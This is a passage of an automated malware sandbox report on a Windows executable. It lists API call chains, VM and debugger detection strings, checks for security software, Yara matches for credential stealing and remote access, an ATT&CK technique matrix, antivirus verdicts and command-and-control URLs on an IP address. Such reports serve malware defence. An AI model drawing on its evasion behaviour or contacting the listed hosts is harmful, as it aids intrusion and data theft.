                      Source: C:\Users\user\Desktop\OW2Pw3W81N.exeCode function: 0_2_00419860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00419860
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                      Malware Analysis System Evasion

                      barindex
                      Source: C:\Users\user\Desktop\OW2Pw3W81N.exeEvasive API call chain: GetUserDefaultLangID, ExitProcessgraph_0-26577
                      Source: C:\Users\user\Desktop\OW2Pw3W81N.exeEvaded block: after key decisiongraph_0-27737
                      Source: C:\Users\user\Desktop\OW2Pw3W81N.exeAPI coverage: 6.9 %
                      Source: C:\Users\user\Desktop\OW2Pw3W81N.exeCode function: 0_2_0040E430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,0_2_0040E430
                      Source: C:\Users\user\Desktop\OW2Pw3W81N.exeCode function: 0_2_004138B0 wsprintfA,FindFirstFileA,lstrcatA,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcatA,lstrlenA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,0_2_004138B0
                      Source: C:\Users\user\Desktop\OW2Pw3W81N.exeCode function: 0_2_00414570 GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcatA,lstrcatA,lstrlenA,lstrlenA,0_2_00414570
                      Source: C:\Users\user\Desktop\OW2Pw3W81N.exeCode function: 0_2_00414910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00414910
                      Source: C:\Users\user\Desktop\OW2Pw3W81N.exeCode function: 0_2_0040ED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlenA,DeleteFileA,CopyFileA,FindNextFileA,FindClose,0_2_0040ED20
                      Source: C:\Users\user\Desktop\OW2Pw3W81N.exeCode function: 0_2_0040BE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,0_2_0040BE70
                      Source: C:\Users\user\Desktop\OW2Pw3W81N.exeCode function: 0_2_0040DE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_0040DE10
                      Source: C:\Users\user\Desktop\OW2Pw3W81N.exeCode function: 0_2_004016D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_004016D0
                      Source: C:\Users\user\Desktop\OW2Pw3W81N.exeCode function: 0_2_0040DA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,0_2_0040DA80
                      Source: C:\Users\user\Desktop\OW2Pw3W81N.exeCode function: 0_2_00413EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,FindNextFileA,FindClose,0_2_00413EA0
                      Source: C:\Users\user\Desktop\OW2Pw3W81N.exeCode function: 0_2_0040F6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_0040F6B0
                      Source: C:\Users\user\Desktop\OW2Pw3W81N.exeCode function: 0_2_022EE697 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,0_2_022EE697
                      Source: C:\Users\user\Desktop\OW2Pw3W81N.exeCode function: 0_2_022F3B17 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,0_2_022F3B17
                      Source: C:\Users\user\Desktop\OW2Pw3W81N.exeCode function: 0_2_022F4B77 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_022F4B77
                      Source: C:\Users\user\Desktop\OW2Pw3W81N.exeCode function: 0_2_022EEF87 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose,0_2_022EEF87
                      Source: C:\Users\user\Desktop\OW2Pw3W81N.exeCode function: 0_2_022F47D7 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,0_2_022F47D7
                      Source: C:\Users\user\Desktop\OW2Pw3W81N.exeCode function: 0_2_022EE077 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_022EE077
                      Source: C:\Users\user\Desktop\OW2Pw3W81N.exeCode function: 0_2_022EDCE7 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,0_2_022EDCE7
                      Source: C:\Users\user\Desktop\OW2Pw3W81N.exeCode function: 0_2_022EF8F1 FindFirstFileA,0_2_022EF8F1
                      Source: C:\Users\user\Desktop\OW2Pw3W81N.exeCode function: 0_2_022EC0D7 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,0_2_022EC0D7
                      Source: C:\Users\user\Desktop\OW2Pw3W81N.exeCode function: 0_2_022E1937 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_022E1937
                      Source: C:\Users\user\Desktop\OW2Pw3W81N.exeCode function: 0_2_022F4107 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,0_2_022F4107
                      Source: C:\Users\user\Desktop\OW2Pw3W81N.exeCode function: 0_2_022EF917 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_022EF917
                      Source: C:\Users\user\Desktop\OW2Pw3W81N.exeCode function: 0_2_00401160 GetSystemInfo,ExitProcess,0_2_00401160
                      Source: Amcache.hve.4.drBinary or memory string: VMware
                      Source: Amcache.hve.4.drBinary or memory string: VMware Virtual USB Mouse
                      Source: Amcache.hve.4.drBinary or memory string: vmci.syshbin
                      Source: Amcache.hve.4.drBinary or memory string: VMware, Inc.
                      Source: Amcache.hve.4.drBinary or memory string: VMware20,1hbin@
                      Source: Amcache.hve.4.drBinary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
                      Source: Amcache.hve.4.drBinary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                      Source: Amcache.hve.4.drBinary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
                      Source: OW2Pw3W81N.exe, 00000000.00000002.2255052204.000000000073D000.00000004.00000020.00020000.00000000.sdmp, OW2Pw3W81N.exe, 00000000.00000002.2255052204.000000000078A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                      Source: Amcache.hve.4.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                      Source: Amcache.hve.4.drBinary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
                      Source: Amcache.hve.4.drBinary or memory string: c:/windows/system32/drivers/vmci.sys
                      Source: Amcache.hve.4.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                      Source: Amcache.hve.4.drBinary or memory string: vmci.sys
                      Source: Amcache.hve.4.drBinary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
                      Source: Amcache.hve.4.drBinary or memory string: vmci.syshbin`
                      Source: Amcache.hve.4.drBinary or memory string: \driver\vmci,\driver\pci
                      Source: Amcache.hve.4.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                      Source: Amcache.hve.4.drBinary or memory string: VMware20,1
                      Source: Amcache.hve.4.drBinary or memory string: Microsoft Hyper-V Generation Counter
                      Source: Amcache.hve.4.drBinary or memory string: NECVMWar VMware SATA CD00
                      Source: Amcache.hve.4.drBinary or memory string: VMware Virtual disk SCSI Disk Device
                      Source: OW2Pw3W81N.exe, 00000000.00000002.2254974020.00000000006FE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMware
                      Source: Amcache.hve.4.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
                      Source: Amcache.hve.4.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
                      Source: Amcache.hve.4.drBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
                      Source: Amcache.hve.4.drBinary or memory string: VMware PCI VMCI Bus Device
                      Source: Amcache.hve.4.drBinary or memory string: VMware VMCI Bus Device
                      Source: Amcache.hve.4.drBinary or memory string: VMware Virtual RAM
                      Source: Amcache.hve.4.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
                      Source: Amcache.hve.4.drBinary or memory string: vmci.inf_amd64_68ed49469341f563
                      Source: C:\Users\user\Desktop\OW2Pw3W81N.exeAPI call chain: ExitProcess graph end nodegraph_0-26565
                      Source: C:\Users\user\Desktop\OW2Pw3W81N.exeAPI call chain: ExitProcess graph end nodegraph_0-26562
                      Source: C:\Users\user\Desktop\OW2Pw3W81N.exeAPI call chain: ExitProcess graph end nodegraph_0-27991
                      Source: C:\Users\user\Desktop\OW2Pw3W81N.exeAPI call chain: ExitProcess graph end nodegraph_0-26584
                      Source: C:\Users\user\Desktop\OW2Pw3W81N.exeAPI call chain: ExitProcess graph end nodegraph_0-26575
                      Source: C:\Users\user\Desktop\OW2Pw3W81N.exeAPI call chain: ExitProcess graph end nodegraph_0-26404
                      Source: C:\Users\user\Desktop\OW2Pw3W81N.exeAPI call chain: ExitProcess graph end nodegraph_0-26449
                      Source: C:\Users\user\Desktop\OW2Pw3W81N.exeAPI call chain: ExitProcess graph end nodegraph_0-26605
                      Source: C:\Users\user\Desktop\OW2Pw3W81N.exeCode function: 0_2_0041AD48 memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0041AD48
                      Source: C:\Users\user\Desktop\OW2Pw3W81N.exeCode function: 0_2_004045C0 VirtualProtect ?,00000004,00000100,000000000_2_004045C0
                      Source: C:\Users\user\Desktop\OW2Pw3W81N.exeCode function: 0_2_00419860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00419860
                      Source: C:\Users\user\Desktop\OW2Pw3W81N.exeCode function: 0_2_00419750 mov eax, dword ptr fs:[00000030h]0_2_00419750
                      Source: C:\Users\user\Desktop\OW2Pw3W81N.exeCode function: 0_2_00712BB9 push dword ptr fs:[00000030h]0_2_00712BB9
                      Source: C:\Users\user\Desktop\OW2Pw3W81N.exeCode function: 0_2_022E092B mov eax, dword ptr fs:[00000030h]0_2_022E092B
                      Source: C:\Users\user\Desktop\OW2Pw3W81N.exeCode function: 0_2_022F99B7 mov eax, dword ptr fs:[00000030h]0_2_022F99B7
                      Source: C:\Users\user\Desktop\OW2Pw3W81N.exeCode function: 0_2_022E0D90 mov eax, dword ptr fs:[00000030h]0_2_022E0D90
                      Source: C:\Users\user\Desktop\OW2Pw3W81N.exeCode function: 0_2_00417850 GetProcessHeap,HeapAlloc,GetUserNameA,0_2_00417850
                      Source: C:\Users\user\Desktop\OW2Pw3W81N.exeCode function: 0_2_0041AD48 memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0041AD48
                      Source: C:\Users\user\Desktop\OW2Pw3W81N.exeCode function: 0_2_0041CEEA SetUnhandledExceptionFilter,0_2_0041CEEA
                      Source: C:\Users\user\Desktop\OW2Pw3W81N.exeCode function: 0_2_0041B33A IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_0041B33A
                      Source: C:\Users\user\Desktop\OW2Pw3W81N.exeCode function: 0_2_022FAFAF memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_022FAFAF
                      Source: C:\Users\user\Desktop\OW2Pw3W81N.exeCode function: 0_2_022FD151 SetUnhandledExceptionFilter,0_2_022FD151
                      Source: C:\Users\user\Desktop\OW2Pw3W81N.exeCode function: 0_2_022FB5A1 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_022FB5A1
                      Source: C:\Users\user\Desktop\OW2Pw3W81N.exeMemory protected: page guardJump to behavior

                      HIPS / PFW / Operating System Protection Evasion

                      barindex
                      Source: Yara matchFile source: Process Memory Space: OW2Pw3W81N.exe PID: 4148, type: MEMORYSTR
                      Source: C:\Users\user\Desktop\OW2Pw3W81N.exeCode function: 0_2_00419600 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,0_2_00419600
                      Source: C:\Users\user\Desktop\OW2Pw3W81N.exeCode function: 0_2_022F9867 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,0_2_022F9867
                      Source: C:\Users\user\Desktop\OW2Pw3W81N.exeCode function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,0_2_00417B90
                      Source: C:\Users\user\Desktop\OW2Pw3W81N.exeCode function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,0_2_022F7DF7
                      Source: C:\Users\user\Desktop\OW2Pw3W81N.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\OW2Pw3W81N.exeCode function: 0_2_00416920 GetSystemTime,sscanf,SystemTimeToFileTime,SystemTimeToFileTime,ExitProcess,0_2_00416920
                      Source: C:\Users\user\Desktop\OW2Pw3W81N.exeCode function: 0_2_00417850 GetProcessHeap,HeapAlloc,GetUserNameA,0_2_00417850
                      Source: C:\Users\user\Desktop\OW2Pw3W81N.exeCode function: 0_2_00417A30 GetProcessHeap,HeapAlloc,GetTimeZoneInformation,wsprintfA,0_2_00417A30
                      Source: Amcache.hve.4.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
                      Source: Amcache.hve.4.drBinary or memory string: msmpeng.exe
                      Source: Amcache.hve.4.drBinary or memory string: c:\program files\windows defender\msmpeng.exe
                      Source: Amcache.hve.4.drBinary or memory string: MsMpEng.exe

                      Stealing of Sensitive Information

                      barindex
                      Source: Yara matchFile source: 0.2.OW2Pw3W81N.exe.22e0e67.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.OW2Pw3W81N.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.3.OW2Pw3W81N.exe.2330000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.OW2Pw3W81N.exe.22e0e67.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.OW2Pw3W81N.exe.400000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.3.OW2Pw3W81N.exe.2330000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000000.00000002.2255052204.000000000073D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.2254743598.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.2073023114.0000000002330000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.2255305705.00000000022E0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: OW2Pw3W81N.exe PID: 4148, type: MEMORYSTR
                      Source: Yara matchFile source: dump.pcap, type: PCAP

                      Remote Access Functionality

                      barindex
                      Source: Yara matchFile source: 0.2.OW2Pw3W81N.exe.22e0e67.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.OW2Pw3W81N.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.3.OW2Pw3W81N.exe.2330000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.OW2Pw3W81N.exe.22e0e67.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.OW2Pw3W81N.exe.400000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.3.OW2Pw3W81N.exe.2330000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000000.00000002.2255052204.000000000073D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.2254743598.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.2073023114.0000000002330000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.2255305705.00000000022E0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: OW2Pw3W81N.exe PID: 4148, type: MEMORYSTR
                      Source: Yara matchFile source: dump.pcap, type: PCAP
                      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                      Gather Victim Identity InformationAcquire InfrastructureValid Accounts12
                      Native API
                      1
                      DLL Side-Loading
                      11
                      Process Injection
                      1
                      Masquerading
                      OS Credential Dumping2
                      System Time Discovery
                      Remote ServicesData from Local System1
                      Encrypted Channel
                      Exfiltration Over Other Network MediumAbuse Accessibility Features
                      CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
                      DLL Side-Loading
                      1
                      Virtualization/Sandbox Evasion
                      LSASS Memory31
                      Security Software Discovery
                      Remote Desktop ProtocolData from Removable Media2
                      Ingress Tool Transfer
                      Exfiltration Over BluetoothNetwork Denial of Service
                      Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)11
                      Disable or Modify Tools
                      Security Account Manager1
                      Virtualization/Sandbox Evasion
                      SMB/Windows Admin SharesData from Network Shared Drive2
                      Non-Application Layer Protocol
                      Automated ExfiltrationData Encrypted for Impact
                      Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook11
                      Process Injection
                      NTDS11
                      Process Discovery
                      Distributed Component Object ModelInput Capture12
                      Application Layer Protocol
                      Traffic DuplicationData Destruction
                      Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                      Deobfuscate/Decode Files or Information
                      LSA Secrets1
                      Account Discovery
                      SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                      Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts3
                      Obfuscated Files or Information
                      Cached Domain Credentials1
                      System Owner/User Discovery
                      VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                      DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items22
                      Software Packing
                      DCSync1
                      File and Directory Discovery
                      Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                      Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                      DLL Side-Loading
                      Proc Filesystem123
                      System Information Discovery
                      Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                      Hide Legend

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet

                      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                      windows-stand
                      SourceDetectionScannerLabelLink
                      OW2Pw3W81N.exe42%ReversingLabsWin32.Trojan.Generic
                      OW2Pw3W81N.exe51%VirustotalBrowse
                      OW2Pw3W81N.exe100%AviraHEUR/AGEN.1307867
                      OW2Pw3W81N.exe100%Joe Sandbox ML
                      No Antivirus matches
                      No Antivirus matches
                      No Antivirus matches
                      SourceDetectionScannerLabelLink
                      http://upx.sf.net0%URL Reputationsafe
                      http://62.122.184.144/f88d87a7e087e100.php17%VirustotalBrowse
                      http://62.122.184.14416%VirustotalBrowse
                      http://62.122.184.144/x15%VirustotalBrowse
                      http://62.122.184.144/16%VirustotalBrowse
                      No contacted domains info
                      NameMaliciousAntivirus DetectionReputation
                      http://62.122.184.144/trueunknown
                      http://62.122.184.144/f88d87a7e087e100.phptrueunknown
                      NameSourceMaliciousAntivirus DetectionReputation
                      http://upx.sf.netAmcache.hve.4.drfalse
                      • URL Reputation: safe
                      unknown
                      http://62.122.184.144/xOW2Pw3W81N.exe, 00000000.00000002.2255052204.000000000073D000.00000004.00000020.00020000.00000000.sdmpfalseunknown
